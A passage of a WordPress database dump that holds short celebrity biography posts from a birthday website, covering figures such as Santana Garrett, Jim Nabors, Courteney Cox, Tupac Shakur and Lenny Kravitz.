wrestler</a> under the ring names Brittany, Santana, Santana G and Santana Garrett. She is also an American model and a valet (female wrestling manager).\r\n<h2>In the Beginning</h2>\r\n<a href=\"http://www.cagematch.net/?id=2&nr=10198\" target=\"_blank\">Santana Garrett</a> was born on May 22, 1988 , (which makes her a Gemini) in Ocala, Florida. Her wrestling career began in 2009 in Bruno Sassi’s South Florida based Coastal Championship Wrestling, where she defeated a wrestler named Kimberly and won the CCW Ladies Championship in her debut match. She wrestled in the CCW circuit from 2009-2014, with many wins, a few defeats, and some excellent storylines, under her belt.\r\n<h2>Career Accomplishments</h2>\r\nA year into working with CCW Wrestling, Santana began to do International wrestling, appearing in an IWA Mid-South winning match against Jessika Haze. She appeared in PWX Wrestlewar. She was the first female to win the Florida Cruiserweight Championship. In 2010 she made her debut for Total Nonstop Action Wrestling (TNA) edition of Impact!. She’s also worked with SHINE Wrestling. She has paired up with several wrestlers including Amber O’Neal others. After losing the Shine Championship to Mia Yim, she successfully defended her title for the NWA World Women’s Championship and then defeated Yim in a Title vs Title Match and won the SHINE Championship.\r\n<h2>Most Known For</h2>\r\nSantana Garrett is best known for her work at Total Nonstop Action (TNA) Wrestling under the name Brittany. While she had worked with <a href=\"http://www.impactwrestling.com/\" target=\"_blank\">TNA</a> before, this time she signed on for an edition of <em>Impact Wrestling</em> under the ring name Brittany. Brittany had an intense storyline that the fans loved. She started as a face, but after Rayne refused her romantic advances, Brittany became a heel. Ultimately, Brittany lost to Rayne in a No Count Out, No Disqualification Match. Once that plotline had finished, Brittany moved on to a storyline with Samuel Shaw in mid-September. However it never fully finished because, after Dec 5<sup>th</sup> she was no longer under contract with TNA, and returned to SHINE where her career is truly flourishing.\r\n<h2>Current Personal Life</h2>\r\nSantana is a second-generation professional wrestler. Her father is Kenny Garrett who is also known as “TNT” Kenny G. She says that he has taught her a lot about the business as she grew up, it is something she always knew she wanted.\r\n\r\nRecently, the wrestling fans buzzed with excitement when pictures surfaced online of Santana and another wrestler named Chasyn Rance in <a href=\"http://www.wrestlinginc.com/wi/news/2014/1004/582671/tna-knockout-gets-married/\" target=\"_blank\">wedding attire</a>. However, it was a modeling photoshoot, the two did not actually marry. She Instagrammed a picture with a caption that said, “That one time…I did NOT get married…It was a modeling gig boys & girls.”\r\n\r\nWhen she’s not wrestling or modeling, she works as a sleep technician.\r\n<h2>Where Are They Now</h2>\r\nOn December 5, 2014, Santana returned to SHINE 23. She made quite the return by defeating her villainous former tag team partner Amber O’Neal. Currently, she holds four different titles. She has the NWA Women’s Title, the SHINE Title, Ring Warriors Title, and Southern Championship Wrestling (SCW) Women’s Title. She is scheduled to defend these titles in what is sure to be very exciting matches.\r\n\r\n[<a href=\"https://www.flickr.com/photos/denaflows/2965348054/sizes/z/\" target=\"_blank\">Image</a>]\r\n\r\n ','Santana Garrett','','publish','open','open','','santana-garrett','','','2015-10-14 16:23:36','2015-10-14 16:23:36','',0,'http://birthdaypedia.wpengine.com/?p=67',0,'post','',0),(69,2,'2015-06-12 09:06:23','2015-06-12 09:06:23','<h2>In the Beginning</h2>\r\nBorn in 1930 Alabama, Jim Nabors grew up less than healthy, and eventually had to move to Los Angeles for his asthma. Still, not even health issues could have kept him from reaching out into the cabaret, finding his way into showbiz. He was discovered by Andy Griffith himself, and debuted on television in the <a href=\"http://www.telovation.com/articles/andy-griffith-show.html\" target=\"_blank\">Andy Griffith show</a>. In just one episode, Nabors established himself so well, and was so entertaining, that he even got his own spinoff show.\r\n\r\nSurprisingly enough, his spinoff didn’t end by the station’s refusal to fund another season, but Nabors’ own ambition. He wanted better, and so he stretched out for more, reaching into the music industry. His baritone quickly gained popularity, securing Nabors’ well earned reputation as a entertainment multitasker.\r\n<h2>Career Accomplishments</h2>\r\nWhile Nabors was typecast as a comedic character, he did manage to get a serious role in <a href=\"http://www.grittv.com/show/rookies/\" target=\"_blank\">The Rookies</a>, and showed his ability to expand into deeper roles. He sang the national anthem at a Major League Baseball game, and decided to rejoin the theater not long after. He’s toured on Broadway in Man of La Mancha, sung in concerts, and enjoyed his own music before being convinced back to television again.\r\n\r\nHe’s appeared in The Muppet Show, The Best Little Whorehouse in Texas, Cannonball Run II, and The Sonny and Cher Show, among many other appearances in shows, and running his own. He’s only been in four movies, but his long career has led him to a star on the Hollywood Walk of Fame, honors at the Hawaii Pacific University, University of Hawaii, and the University of Alabama. Both he and his original character Gomer Pyle\r\n<h2>Most Known For</h2>\r\nWhen it comes to Jim Nabors, everyone remembers him differently. One of the biggest things he’s known for is singing “<a href=\"http://www.jimnabors.com/NationalSportsNews/\" target=\"_blank\">Back Home Again in Indiana</a>” for the Indianapolis 500 for over 30 years. Others remember him for his accomplishments as Gomer Pyle, his first television character, or his fantastic singing voice. What Jim Nabors is most famous for is Jim Nabors. He’s been on dozens of television shows, both as himself and as a character, and is a TV personality that was on screen for more than 20 years. He’s had two shows of his own, and has used them to make a real name for himself. Jim Nabors is known as a television man, and will most likely keep that reputation for decades to come.\r\n<h2>Current Personal Life</h2>\r\nAfter a nearly deadly meeting with Hepatitis B, and a move from Los Angeles to Hawaii, Jim Nabors now lives happily with his husband Stan Cadwallader, the long-time partner he married in 2013. After a long life of traveling and showbiz, Nabors has calmed things down, quitting his yearly gig at the Indy 500 due to his health, and enjoying the fruits of his labor. He has a wonderful home, a great legacy, and a husband to come home to at night. He’s living the dream that many people wish they had, especially towards the end of their lives.\r\n<h2>Where Are They Now</h2>\r\nJim Nabors is currently living in his home in <a href=\"http://americanprofile.com/articles/actor-jim-nabors-video/\" target=\"_blank\">Hawaii</a> with Stan Cadwallader, limiting his traveling and show appearances due to his health issues.\r\n\r\n[<a href=\"https://www.flickr.com/photos/picturemommy/16703879703/sizes/z/\" target=\"_blank\">Image</a>]\r\n\r\n ','Jim Nabors','','publish','open','open','','jim-nabors','','','2015-10-14 17:46:52','2015-10-14 17:46:52','',0,'http://birthdaypedia.wpengine.com/?p=69',0,'post','',0),(70,2,'2015-06-15 09:18:33','2015-06-15 09:18:33','<h2>In the Beginning</h2>\r\n<a href=\"http://courteneycox.org/biography.htm\" target=\"_blank\">Courteney Cox</a> was born in Mountain Brook, Alabama, on June 15, 1964. In a family of five, now six, Courteney grew up with two older sisters and one older brother. She eventually left for college, aiming for a degree in architecture, and got sidetracked into acting. She debuted in the 1984 Bruce Springsteen music video “Dancing in the Dark,” starting off her career. In less than ten years, she’d managed to appear in such big names as Ace Ventura, the TV show Seinfeld, Family Ties, and Mr. Destiny.\r\n<h2>Career Accomplishments</h2>\r\nIn Courteney’s long career, she’s managed to find her way into many huge productions, showing her beautiful face and quirky acting to many producers. With a great attitude and a willingness to work, she found herself in the Scream trilogy, reprising her 90’s role in 2011 for Scream 4. In the new millennia, she showed up in Zoom, The Longest Mile, and Sex and the City: the Movie. In 2007, she returned to TV, showing up in FX’s Dirt, Scrubs, and <a href=\"http://variety.com/2015/tv/news/cougar-town-series-finale-courteney-cox-josh-hopkins-1201461895/\" target=\"_blank\">Cougar Town</a>. Still going strong, Courteney is adding to her long resume each year, and will continue to make the crowds clamor for her.\r\n<h2>Most Known For</h2>\r\nOne of the items skipped in her career accomplishments is the biggest accomplishment of them all: Friends. Originally, Courteney Cox was brought in to audition for the roll of Rachel Green, but was given the role of <a href=\"http://www.buzzfeed.com/stephaniebergan/are-you-more-rachel-green-or-monica-geller-1624q#.pr2N4do2m\" target=\"_blank\">Monica Geller</a> instead. For ten entire seasons, Courteney Cox co-starred as a quirky clean freak who struggled with her chef career and hosted countless shenanigans in her New York apartment. With her costars, she changed the layout of television shows, and changed how much TV actors get paid per episode. Friends changed how people view television, and somehow managed to create a show that no one has ever been able to match: a show with 6 costars that all shine equally in each episode.\r\n<h2>Current Personal Life</h2>\r\nCourteney has long been looking for a lasting love, dating men such as Ian Copeland, Michael Keaton, and Adam Duritz, and finally found her man in David Arquette. On June 12, 1999, Arquette and Cox made it official, having a beautiful wedding, and sharing the birth of Coco Riley Arquette in 2004. Unfortunately, it wasn’t to be, and they filed for divorce in 2012 after two years of total separation. While still friends, David Arquette is now the ex-husband, working with her in their business Coquette Productions. In 2013, Courteney moved on and found a new interest in <a href=\"https://en.wikipedia.org/wiki/Johnny_McDaid\" target=\"_blank\">Johnny McDaid</a>. A Twitter post on June 26, 2014 stated that Courteney and Johnny were officially engaged.\r\n<h2>Where Are They Now</h2>\r\nToday, despite an entire year passing since their engagement, there has still been no word on a wedding date. Despite rushing into a proposal after only six months of dating, they don’t seem to be hurried to walk down the aisle. Coco, her daughter, is happy with Courteney’s fiancé, and has plans to become their new wedding planner. She’s declared herself to be the flower girl and all the bridesmaids, and has begun planning the wedding for her mother.\r\n\r\n[<a href=\"https://www.flickr.com/photos/goalbert/4411919194/sizes/z/\" target=\"_blank\">Image</a>]\r\n\r\n ','Courteney Cox','','publish','open','open','','courteney-cox','','','2015-10-14 17:51:10','2015-10-14 17:51:10','',0,'http://birthdaypedia.wpengine.com/?p=70',0,'post','',0),(71,2,'2015-06-16 10:27:52','2015-06-16 10:27:52','<h2>In the Beginning</h2>\r\nTupac Shakur was born in 1971 as Lesane Parish Crooks, in the beautiful Manhattan district of New York City. He grew up with the guidance of his parents, Alice Faye Williams and Billy Garland, notable Black Panther members, and grew up surrounded by similar people. He was in the care of many Black Panther, <a href=\"http://www.newspress.com/terrorbehindbars/history.htm\" target=\"_blank\">Black Liberation Army</a>, and FBI’s Most Wanted members, but that couldn’t stop the music in his heart. Lesane tried out for Harlem’s 127th Street Reparatory Ensemble, and received his first ever role as Travis in A Raisin in the Sun. He moved to Maryland for his high school years, and dove deeper into theater and music, even learning ballet on the side. However, he wasn’t just an actor. He was a deep thinker, performing Shakespeare, wrote his own rap music and performed it in front of his peers, and would eventually write a book and a few poems.\r\n<h2>Career Accomplishments</h2>\r\nIn 1991, Tupac made his debut in the real music industry by showing what he could do in Digital Underground’s “Same Song.” Lesane officially became Tupac, and he pulled together his first solo album, <a href=\"http://www.allmusic.com/album/2pacalypse-now-mw0000676677\" target=\"_blank\">2Pacalypse Now</a>. This was his first step into a very drama-laden career, full of controversy because of the topics Tupac brought to life. He tried to make his experiences work for him, writing raps to defend and explain the things young black males go through in the 80’s and 90’s, and what they’re struggling through at the time of his recording. He managed to expose many different topics that people would blame him for pointing out, causing a big stink. However, in five years, he produced 5 studio albums, rising quickly to the limelight.\r\n<h2>Most Known For</h2>\r\n<a href=\"http://www.theguardian.com/music/2011/jun/13/tupac-biggie-deaths\" target=\"_blank\">Tupac</a> is most known for his rapping, and his deep lyrics. He wrote most of his own raps, focusing on the problems of young black males. He was deeply influenced by English rappers and Shakespeare, and looked up to the historic playwright. He became famous for his albums, meeting up with other rappers and creating groups between them to make shared albums speaking out against the problems of their time.\r\n<h2>Current Personal Life</h2>\r\nThe early 90’s were difficult for Tupac. In 1991, Tupac filed a lawsuit against the Oakland Police Department for police brutality. He won $43,000. In 1992, he got into a fight after a concert, and his gun was used to accidentally shoot a passing boy, 6 year old Qa’id Walker Teal. Though it was never proved to be Tupac who shot the gun, he paid the family for loss of life. In 1993, he was charged with felonious assault and sexually assaulting a woman, with two different filings. The felonious assault charges were dropped, but his sexual assault case was ruled against him, sentencing him to 1-4 years in prison. He claimed his innocence through the end, but accepted his sentence quietly. In 1994, he was shot in an attack on <a href=\"http://www.quadnyc.com/\" target=\"_blank\">Quad Recording Studio</a>, but survived.\r\n<h2>Where Are They Now</h2>\r\nOn September 7, 1996, Tupac was in an incident where he was shot in multiple places, one bullet piercing his lung. After a few days in critical condition, Tupac finally lost his battle for life, due to heavy internal bleeding that could not be stopped.\r\n\r\n[<a href=\"https://www.flickr.com/photos/tupacamarushakur/4731410192/sizes/l\" target=\"_blank\">Image</a>]\r\n\r\n ','Tupac Shakur','','publish','open','open','','tupac-shakur','','','2015-10-14 17:56:47','2015-10-14 17:56:47','',0,'http://birthdaypedia.wpengine.com/?p=71',0,'post','',0),(73,2,'2015-06-17 09:19:08','2015-06-17 09:19:08','<h2>In the Beginning</h2>\r\nBarry Alan Pincus was born on June 17, 1943, in Brooklyn, New York. He grew up in a Jewish home, working hard to earn his high school degree in 1961. While he aimed to head off to college, and got into <a href=\"http://www.ccny.cuny.edu/\" target=\"_blank\">City College of New York,</a> he was almost immediately sidetracked into the New York College of Music. There he found his true passion and talent, beginning working at the bottom of the totem pole at CBS to pay his bills, and spent some time with partner Susan Deixler, though sources differ on how long his marriage with her lasted. He studied in <a href=\"http://www.juilliard.edu/\" target=\"_blank\">Julliard</a>, and soon began to earn his way as a producer, pianist, and arranger of music.\r\n<h2>Career Accomplishments</h2>\r\nBy the time bell-bottoms came into style, Manilow had found his way into writing jingles, making music for Off Broadway productions, and making some jingles that we still remember (Like a good neighbor…). In the 70’s, Manilow reached out even farther, meeting up with Bette Midler, who helped him become more than just an accompanist to other stars. In 1973, Manilow debuted his first album of many, following it up with his second not even a year later. His second album in 1974 contained his famous “<a href=\"http://www.biography.com/people/barry-manilow-9542490\" target=\"_blank\">Mandy</a>,” highlighting his brilliance and starting off his shining career. Since then, he’s released dozens of albums, all of which were received eagerly by fans worldwide.\r\n<h2>Most Known For</h2>\r\nBarry Manilow is most known for his amazing singing and piano work, reaching across generations and language barriers. If you talk to a teenager today, they might not know who Barry Manilow is, but the chances that they’ve heard of someone talking about the Copa Cabana, or Mandy, are incredibly high. Manilow hasn’t just been a singer, however. He’s shown his big heart during multiple crises, providing support to Hurricane Hugo survivors in 1989 and again with Hurricane Katrina in 2005. He has stuck to his guns politically and personally, providing charity events across the nation and refusing to tie himself to a political event. He didn’t want to be known like that, to the point where he canceled his appearance in a charity show because he found out it was not non-partisan, as he was promised it would be. Manilow has aimed to keep his music and appearances pure and about entertainment, not politics or money.\r\n<h2>Current Personal Life</h2>\r\nIn 2006 and again in 2011, Manilow had to have hip surgery, and didn’t let it stop him for too long. After his first surgery, he continued his appearances in a wheelchair, though in 2011 he had to cancel a few appearances due to poor health. He continued to give performances through June 17, 2015.\r\n<h2>Where Are They Now</h2>\r\nJune 17, 2015 marked the end of Barry Manilow’s <a href=\"http://www.huffingtonpost.com/steve-schonberg/barry-manilow-prepares-fo_b_6515484.html\" target=\"_blank\">career</a>. After a four month farewell tour, Manilow ended his entertainment career in the Barclay Center in Brooklyn. Never one to deny a party, he celebrated his 72<sup>nd</sup> birthday on the same day, going out with a bang and a reminder that Barry Manilow didn’t leave with a tail between his legs, but because he decided it was time to relax and enjoy retirement.\r\n\r\n[<a href=\"https://www.flickr.com/photos/salomon888/122737214/sizes/o/\" target=\"_blank\">Image</a>]\r\n\r\n ','Barry Manilow','','publish','open','open','','barry-manilow','','','2015-10-14 17:57:10','2015-10-14 17:57:10','',0,'http://birthdaypedia.wpengine.com/?p=73',0,'post','',0),(74,2,'2015-05-25 12:30:49','2015-05-25 12:30:49','<h2>Background</h2>\r\n<a href=\"http://www.mckellen.com/\" target=\"_blank\">Ian McKellen</a>, whose full name is Sir Ian Murray McKellen and goes by the nickname Serena, was born on 25th May 1939 in Burnley, Lancashire, England. His ambitions to become an actor started while he was still at the Bolton School. At the time, he used to act at the Bolton Little Theatre. Later on, at the age of 18, he won a scholarship to the St. Catherine College in Cambridge where he studied English literature.\r\n\r\nDuring these early years, he appeared in a number of theatrical productions. However, his first professional appearance was at the Belgrade Theatre in 1961 where he played Roper in <a href=\"http://www.sparknotes.com/lit/amanforallseasons/summary.html\" target=\"_blank\">A Man for All Seasons</a>. Come the 70\'s and 80\'s, he played leading roles in various Shakespearean performances.\r\n<h2>Career Accomplishments</h2>\r\nMcKellen\'s work (both within the theatre and the film industry) has seen him get awarded a total of eighteen internationally recognized awards. These include six Laurence Oliver Awards, four Drama Desk Awards, two <a href=\"http://www.hitfix.com/in-contention/10-times-the-critics-choice-was-right-and-oscar-was-wrong\" target=\"_blank\">Critics Choice Awards</a>, two Saturn Awards and, a Screen Actors Guild, BIF, Tony and Golden Globe Awards.\r\n\r\nIt\'s through his work in the film and theater industry that his name made it to the World Pride Power top ten list.\r\n<h2>Most Notable Works</h2>\r\nMcKellen gained worldwide recognition in the 90\'s after having starred in a number of blockbuster films in Hollywood. These include his highly acclaimed role in Six Degrees of Separation, And the Band Played On, Richard III, Apt Pupil and Gods and Monsters.\r\n\r\nOf all his works and performances, the most outstanding ones include his roles in <a href=\"http://www.imdb.com/title/tt0903624/\" target=\"_blank\">The Hobbit</a>, X-Men, Magneto and The Lord of the Rings.\r\n<h2>Personal Life</h2>\r\nMcKellen comes from a highly religious background (his father was a lay preacher while both his grandfathers and great-grandfather were preachers). His mother died when he was only 12 years old and his father when he was 24.\r\n\r\nIan McKellen is gay. His first relationship was with Brian Taylor, a history teacher. The relationship lasted for eight years. In 1978, he met Sean Mathias whom he had a 10 year long love affair with.\r\n\r\nIn 1979, McKellen was appointed the Commander of the Order of the British Empire and in 1991, was knighted and made a Companion of Honor.\r\n\r\nThough McKellen was diagnosed with prostate cancer in 2006, he has clarified that there\'s absolutely nothing to worry about.\r\n<h2>Where Is He Now?</h2>\r\nMcKellen currently stars as Freddie Thornhill in ITV sitcom <a href=\"http://www.theguardian.com/tv-and-radio/2015/jun/01/vicious-mckellen-jacobi-de-la-tour\" target=\"_blank\">Vicious</a>. Other than acting, he is also an ordained minister, a Doctor of Letters (after being awarded an honorary degree by the Cambridge University), a Freeman of the city of London, a LGBT activist, a philanthropist, the President and patron of the Little Theater Guild of Great Britain and, the patron of the Bolton Little Theater.\r\n\r\nMcKellen is also a co-founder of the Stonewall which is a LGBT lobby group that\'s based in United Kingdom. In addition, he is a patron of the Pride London, The Lesbian & Gay Foundation, LGBT History Month, FFLAG, GAY-GLOS and The Albert Kennedy Trust - an organisation that supports young, troubled and homeless LGBT individuals.\r\n\r\n[<a href=\"https://www.flickr.com/photos/binaryape/4934881771/sizes/z/\" target=\"_blank\">Image</a>]\r\n\r\n ','Ian McKellen','','publish','open','open','','ian-mckellen','','','2015-10-14 16:23:53','2015-10-14 16:23:53','',0,'http://birthdaypedia.wpengine.com/?p=74',0,'post','',0),(75,2,'2015-05-27 10:43:29','2015-05-27 10:43:29','<h2>Background</h2>\r\n<a href=\"http://www.bornrich.com/jamie-oliver.html\" target=\"_blank\">James Trevor Oliver</a>, commonly known as Jamie Oliver, is a celebrity chef, restaurateur, chef and media personality. He was born on May 27th 1975 in Clavering, England. His love for food started at an early age as his parents used to run a restaurant cum pub; The Cricketers, where he started practicing how to cook.\r\n\r\nOliver schooled at the Newport Free Grammar School up until he was sixteen. He later enrolled at the Westminster Catering College where he earned a National Vocational Qualification in home economics.\r\n\r\nHe started working at Antonio Carluccio\'s Neal\'s Yard restaurant as a pastry chef. He later on moved to The River Café in Fulham where he worked as a sous chef. While here, he made an unscripted appearance in a BBC documentary \'Christmas at The River Café\'. That appearance opened doors for him as two years later (1999), his cooking show \'The Naked Chef\' debuted on BBC.\r\n<h2>Career Accomplishments</h2>\r\nOliver\'s first breakthrough came in 1999 - the time his first cook show \'The Naked Chef\' debuted on BBC. At the same time, he published a cookbook which became United Kingdom\'s #1 bestseller. This saw him getting an invite at the Downing Street to prepare lunch for the then Prime Minister; Tony Blair.\r\n\r\nA year later, he was the face of Sainsbury\'s - a supermarket chain in UK. The endorsement was worth $2 million per annum. The partnership lasted for eleven years. He is currently partnering with Sobeys - a Canadian supermarket chain as well as with Australian Woolworths.\r\n\r\nSince The Naked Chef on BBC, Oliver has done a documentary titled Jamie\'s Kitchen and four television series titled Jamie\'s Ministry of Food, Jamie Oliver\'s Food Revolution, Jamie\'s 15 Minute Meals and Jamie\'s School Dinners among others. Today, he is a proud owner of a chain of restaurants. The most notable ones are the Fifteen charity restaurants that train young adults from disadvantaged backgrounds.\r\n\r\nAs of today, Jamie Oliver holds a number of awards, honors and recognitions such as being a Member of the Order of the British Empire, being 2005 most inspiring political figure, making it to the list of the richest Britons under 30, being awarded the 2010\'s <a href=\"https://www.ted.com/talks?q=ted+prize&sort=newest\" target=\"_blank\">TED Prize</a>, being awarded an MBE in Queen\'s Birthday Honors, being awarded the 2012\'s Healthy Cup Award by Harvard School of Public Health and, being awarded an Honorary Fellowship by the Royal College of General Practitioners.\r\n<h2>Most Notable Works</h2>\r\nThough Oliver is best known for his food focused cookbooks and television shows, his global campaign that\'s geared towards better food education gained him more prominence. However, his most outstanding works include that of opening a high-street business venture \'Jamie\'s Italian\' which today has a total of 35 restaurants in its collection. <a href=\"http://www.jamieoliver.com/italian/\" target=\"_blank\">Jamie\'s Italian</a> has been franchised globally and currently has branches in Australia, Turkey, UAE, Ireland, Hong Kong and Singapore.\r\n<h2>Personal Life</h2>\r\nOliver has been married to Juliette North since July 2000. They have four children; three girls and one boy. He and his family reside in his hometown Clavering, Essex in England.\r\n\r\nOliver suffers from <a href=\"https://www.understood.org/en/learning-attention-issues/child-learning-disabilities/dyslexia/understanding-dyslexia\" target=\"_blank\">dyslexia</a> and was only able to read his first novel (Catching Fire) in 2013.\r\n<h2>Where Is He Now?</h2>\r\nOliver continue to host different cook TV shows, run campaign for healthy eating patterns especially in schools, marketing different types of cookware and getting involved in charity work.\r\n\r\n[<a href=\"https://www.flickr.com/photos/flyinghorsepix/4574293820/sizes/o/\" target=\"_blank\">Image</a>]\r\n\r\n ','Jamie Oliver','','publish','open','open','','jamie-oliver','','','2015-07-29 12:49:33','2015-07-29 12:49:33','',0,'http://birthdaypedia.wpengine.com/?p=75',0,'post','',0),(76,2,'2015-05-28 09:51:10','2015-05-28 09:51:10','<h2>Background</h2>\r\nJep Robertson, whose full name is <a href=\"http://duck-dynasty.wikia.com/wiki/Jules_Jeptha_Robertson\" target=\"_blank\">Jules Jeptha Robertson</a> is best known for being the man behind the filming and the editing of the <a href=\"http://alternativemagazineonline.co.uk/2009/11/18/interview-in-conversation-with-everett-peck-animator-cartoonist-and-creator-of-duckman/\" target=\"_blank\">Duckmen DVD series</a> alongside other family hunting videos. He was born on May 28th 1978 in Louisiana to Phil Robertson and Miss Kay (Marsha Kay Robertson). He has three brothers - Willie, Jase and Alan. He is the youngest son in the Robertson family.\r\n\r\nFrom the time he was a young boy, Robertson had always been intrigued by various outdoor activities but most especially hunting.\r\n<h2>Career Accomplishments</h2>\r\nMost of Robertson\'s career accomplishments have been achieved during his time at the Duck Dynasty. Though he\'s normally seen making an appearance during the family dinners, he is a filming and editing professional. In fact, he is the one behind the filming and the editing of the family\'s hunting exploits.\r\n\r\nHaving grown in the duck blind, Robertson is able to utilize his many years of hunting experience hence capable of capturing excellent footage. This is brought about by his ability to think like a hunter behind the camera.\r\n\r\nBefore the show, he and the rest of his family were featured in Benelli Presents Duck Commander series as well as in its spin-off; the Buck Commander. The later still airs on Outdoor Channel.\r\n<h2>Most Notable Works</h2>\r\nThough Robertson has worked in various productions such as Benelli Presents Duck Commander and Duck Commander - Making the Musical, the Duck Dynasty is undisputedly his best work. This is because the show is so far the most popular TV series in history. During its season four premier, approximately 11.8 million people tuned in.\r\n<h2>Personal Life</h2>\r\nDespite having been raised in a Christian household, Robertson started doing drugs at the age of 18. He took all kinds of drugs and lots of alcohol to the extent that he used to suffer from scary blackouts. He however got to clean up his act in time and went back to being a staunch Christian.\r\n\r\nRobertson\'s is married to the love of his life, Jessica Pamela Strickland. The two initially met at a mutual hairstylist\'s parlor but it wasn\'t after they met again at a concert (a week later) that they begun talking and became friends. The couple married four months after they began dating (they began dating in June and got married in October). They have been married for fourteen years (since October 1, 2001) and have four children (three girls and one boy) named Lily, Priscilla, Merritt and River.\r\n\r\nJust like his father Phil, uncle Si and brothers\' Willie, Alan and Jase, Jep Robertson wears an extra long beard.\r\n<h2>Where Is He Now?</h2>\r\nRobertson and his family reside in Louisiana. Aside from working on the <a href=\"http://www.aetv.com/\" target=\"_blank\">A&E</a> reality television series Duck Dynasty, he also works at the family business; Duck Commander, which is a multi-million dollar company. The company specializes in making products for duck hunters (mainly duck call) and other duck and deer hunting merchandise.\r\n\r\n[<a href=\"https://www.flickr.com/photos/statefarm/10696692705/sizes/z/\" target=\"_blank\">Image</a>]\r\n\r\n ','Jep Robertson','','publish','open','open','','jep-robertson','','','2015-10-14 16:26:25','2015-10-14 16:26:25','',0,'http://birthdaypedia.wpengine.com/?p=76',0,'post','',0),(77,2,'2015-05-29 10:58:52','2015-05-29 10:58:52','<h2>Background</h2>\r\n<a href=\"https://en.wikipedia.org/wiki/La_Toya_Jackson\" target=\"_blank\">La Toya Yvonne Jackson</a> is the fifth child in the Jackson family. The former model, singer, songwriter, television personality, actress, activist, businesswoman, author and philanthropist was born on May 29th 1956 to Katherine and Joseph Jackson. She was born in Gary, Indiana.\r\n\r\nThough she wanted to pursue law and specialize in business law, her father insisted that she pursue a career in show business. It’s during this time that she first appeared on The Jacksons (a variety program). At the time, she performed skits, sang and danced. She also formed a musical group with her sisters Janet and Rebbie but never released any material. After this, La Toya started working on her first solo album.\r\n<h2>Career Accomplishments</h2>\r\nLa Toya\'s first album gained modest success with one single making it to the US Rn\'B top 40 chart. However, her third album, \'<a href=\"http://www.mtv.com/artists/latoya-jackson/discography/392150/\" target=\"_blank\">Heart Don\'t Lie</a>\' was highly acclaimed with the singles \'Heart Don\'t Lie\' and \'Hot Potato\' becoming a favorite of many.\r\n\r\nOther than singing, La Toya went ahead to license her name to a fashion line for a period of three years. The contract dictated that she only wear the line\'s items (David Laurenz) in all of her public appearances. She also appeared in Nikon adverts, became a Mahogany Image spokes-model and even launched her own fragrance; La Toya.\r\n\r\nShe has also starred in a number of TV productions some of which include Armed & Famous, <a href=\"http://bigbrother.channel5.com/day-17-enraged-toya-spats-ash\" target=\"_blank\">Celebrity Big Brother</a>, Celebrity Apprentice, American Next Top Model and her very own reality series, Life with La Toya. She also starred in a 2013 off-Broadway musical - Newsical.\r\n\r\nAbove all, in 1991, she had her footprints immortalized on the Rotterdam\'s Star Boulevard Walk of Fame.\r\n<h2>Most Notable Works</h2>\r\nLa Toya\'s single \'Baby Sister\' is considered her best work as it saw her win one of the five outstanding song awards during the 1985\'s World Popular Song Festival. During the same year, she actively participated in composing and singing \'We are the World\' to appeal for famine relief in Ethiopia.\r\n\r\nCome March 1989, she posed topless for Playboy magazine thus instantly turning her into a sex symbol. The magazine sold over 8 million copies.\r\n\r\nAfter a prolonged hiatus, La Toya released \'Startin\' Over\' (in 2011) which was a major success.\r\n<h2>Personal Life</h2>\r\nThough La Toya was initially a very shy girl (she once dropped a friend who started wearing skirts with slits), she would later change so much to the extent that she was dis-fellowshipped from Jehovah Witness. At the same time, she stormed from the family home (at the age 31) and relocated to New York City. She even went ahead to pose topless for Playboy magazine.\r\n\r\nIn September 1989, her manager, <a href=\"http://www.huffingtonpost.com/2013/04/24/latoya-jackson_n_3150042.html\" target=\"_blank\">Jack Gordon</a>, forcibly married her. She is said to have suffered a lot of physical, mental and financial abuse throughout the marriage. She filed for divorce in 1997.\r\n<h2>Where Is She Now?</h2>\r\nCurrently, La Toya Jackson is one of the \'Dancing in Jaffa\' executive producers. The documentary features 150 young Palestinian and Jewish Israelis dancing together in unity.\r\n\r\n[<a href=\"https://www.flickr.com/photos/nathaninsandiego/9289518572/sizes/z/\" target=\"_blank\">Image</a>]\r\n\r\n ','La Toya Jackson','','publish','open','open','','la-toya-jackson','','','2015-10-14 16:28:24','2015-10-14 16:28:24','',0,'http://birthdaypedia.wpengine.com/?p=77',0,'post','',0),(78,2,'2015-05-26 10:09:06','2015-05-26 10:09:06','<h2>Background</h2>\r\nLenny Kravitz aka Leonard Albert Kravitz, formerly known as Romeo Blue, is a world renowned American singer, multi-instrumentalist, songwriter, arranger, producer and actor. He was born on May 26th 1964 in Manhattan, New York to actress Roxie Roker and TV producer Sy Kravitz. He schooled at P.S. 6 elementary school and later Beverly Hills High School.\r\n\r\nBy the age of three, Kravitz was already banging on pans and pots and by the time he reached five, he was certain that he wanted to become a musician. The first instruments he learnt to play were the drums followed by the guitar. He would later teach himself how to play the bass guitar, piano and percussion.\r\n\r\nWhile attempting to get into the music industry, he got a lot of people telling him that his music wasn\'t \'white enough\' or \'black enough.\' Though he released a couple of songs and even an album, it wasn\'t until he met Stephen Elvis Smith (in 1989) that record labels started bidding over him.\r\n<h2>Career Accomplishments</h2>\r\nKravitz\'s musical style incorporates different genres. These include rock, Rn\'B, blues, jazz, soul, hard rock, reggae, folk, ballads and psychedelic pop.\r\n\r\nHe is best known for winning four <a href=\"https://www.grammy.com/\" target=\"_blank\">Grammy Awards</a> for the best male rock vocal performance (four years in a row) hence setting the record for the most consecutive wins and most wins in one category. He has also won numerous MTV video music awards, Blockbuster Entertainment awards, American music awards, BRIT awards and Radio music awards.\r\n<h2>Most Notable Works</h2>\r\nThe musician is best known for his incredibly elaborate music video and stage performances. Some of Kravitz\'s most notable works includes his second album \'<a href=\"http://www.billboard.com/articles/news/46454/lenny-kravitz-reissues-mama-said-from-when-his-life-was-spinning\" target=\"_blank\">Mama Said</a>\' which reached Top 40 with the song \'It Ain\'t Over \'til It\'s Over\' reaching number two on the Billboard Hot 100. Other Kravitz notable songs include \'Stand by my Woman\', \'All I Ever Wanted\', \'What Goes around Comes Around\', \'Can\'t Get you off my Mind\' and \'Fly Away.\'\r\n\r\nGreatest Hits was however his most successful album as it reached number two on the Billboard 200 and sold over 11 million copies.\r\n\r\nKravitz also co-wrote and directed Madonna\'s \'<a href=\"http://www.songfacts.com/detail.php?id=483\" target=\"_blank\">Justify my Love</a>\' - one of Madonna\'s most controversial songs. He has also worked with Steven Tyler, Jay Z and N.E.R.D. among others.\r\n<h2>Personal Life</h2>\r\nThough Kravitz didn\'t grow up in a religious environment, he considers himself a non-denominational Christian.\r\n\r\nHe met his ex-wife Lisa Bonet in 1985 during a New Edition concert. The two eloped and got married in 1987 and had a daughter, Zoe Isabella Kravitz. They divorced in 1993. He still claims that he will remain celibate 